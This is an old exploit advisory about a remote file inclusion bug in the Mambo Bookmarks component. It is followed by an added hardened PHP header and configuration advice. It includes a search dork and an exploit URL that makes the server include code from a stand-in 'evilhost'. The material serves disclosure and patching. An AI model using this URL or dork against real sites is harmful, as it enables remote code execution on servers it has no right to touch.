Bookmarks (mambo Component): $mosConfig_absolute_path not sanitized in components/com_bookmarks/bookmarks_export.php (works with register_globals=on)
Application : Bookmarks - mambo Component
URL : http://mamboxchange.com/frs/download.php/4274/MOS_Com_Bookmarks25-Final_a.zip

The variable $mosConfig_absolute_path is not sanitized; the exploit works with register_globals=on.
Affected code: components/com_bookmarks/bookmarks_export.php, lines 22, 27 and 29:

    require_once( $mosConfig_absolute_path . "/includes/mambo.php" );
    include_once( $mosConfig_absolute_path . '/components/com_bookmarks/language/' . $mosConfig_lang . '.php' );
    include_once( $mosConfig_absolute_path . '/components/com_bookmarks/language/english.php' );

Exploit:
~~~~~~~~
dork: "com_bookmarks"
http://www.vuln.com/components/com_bookmarks/bookmarks_export.php?mosConfig_absolute_path=http://evilhost

Fix
~~~~
Add before the code above:

    defined('_VALID_MOS') or die('Direct access to this location is not allowed.');

Discovered By : vitux
Thanks To : #[email protected], #[email protected], #batamhacker@dal.net, #[email protected]
Special To : donny indocom, eko indocom, ^BLaCk_BaNDitS^, urang subang sadaya, pokona mah kabeh lah
Mail : [email protected], [email protected]
# cilacap 12th august 2007
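A hardened version of the component's entry-file header, as an added example that is not code from the Bookmarks component or from Mambo: it applies the _VALID_MOS guard given in the Fix above and, as defence in depth against register_globals=on, refuses any $mosConfig_absolute_path value that is not the local install root and restricts $mosConfig_lang to a plain file name before it is used in an include path. The helper names bookmarks_safe_base_path and bookmarks_language_file and the assumed directory layout are illustrative.

```php
<?php
/*
 * Added example, not code from the Bookmarks component or from Mambo:
 * a hardened header for a component entry file such as
 * components/com_bookmarks/bookmarks_export.php. The function names and the
 * assumed layout <root>/components/com_bookmarks/<this file> are illustrative;
 * _VALID_MOS, $mosConfig_absolute_path and $mosConfig_lang are Mambo's own names.
 */

// 1. Refuse direct requests. Mambo's index.php defines _VALID_MOS before it
//    dispatches to a component, so a direct hit on this file stops here and
//    request-supplied globals never reach the include statements below.
defined('_VALID_MOS') or die('Direct access to this location is not allowed.');

// 2. Defence in depth for register_globals=on: accept the base path only if it
//    is a local directory that resolves to this install root. A remote URL such
//    as "http://evilhost" or any stream wrapper (anything containing "://") is
//    discarded in favour of the real install root.
function bookmarks_safe_base_path($candidate)
{
    $installRoot = realpath(dirname(__FILE__) . '/../..');

    if (!is_string($candidate) || strpos($candidate, '://') !== false) {
        return $installRoot;
    }
    $resolved = realpath($candidate);   // false for URLs and non-existent paths
    if ($resolved === false || $resolved !== $installRoot) {
        return $installRoot;
    }
    return $resolved;
}

// 3. The language name becomes part of a file name, so limit it to letters and
//    underscores and fall back to the shipped english.php when it is missing.
function bookmarks_language_file($base, $lang)
{
    $dir = $base . '/components/com_bookmarks/language/';
    if (is_string($lang) && preg_match('/^[A-Za-z_]+$/', $lang) && is_file($dir . $lang . '.php')) {
        return $dir . $lang . '.php';
    }
    return $dir . 'english.php';
}

$mosConfig_absolute_path = bookmarks_safe_base_path(
    isset($mosConfig_absolute_path) ? $mosConfig_absolute_path : ''
);

require_once($mosConfig_absolute_path . '/includes/mambo.php');
include_once(bookmarks_language_file(
    $mosConfig_absolute_path,
    isset($mosConfig_lang) ? $mosConfig_lang : 'english'
));
```

The _VALID_MOS guard is the change the advisory asks for and on its own makes the file unreachable by direct request; the two path checks only matter if the file is ever included by some other route. Independently of the component, setting PHP's allow_url_fopen (and, from PHP 5.2, allow_url_include) to Off stops include and require from fetching remote URLs at all, which blunts this class of inclusion bug across the whole install.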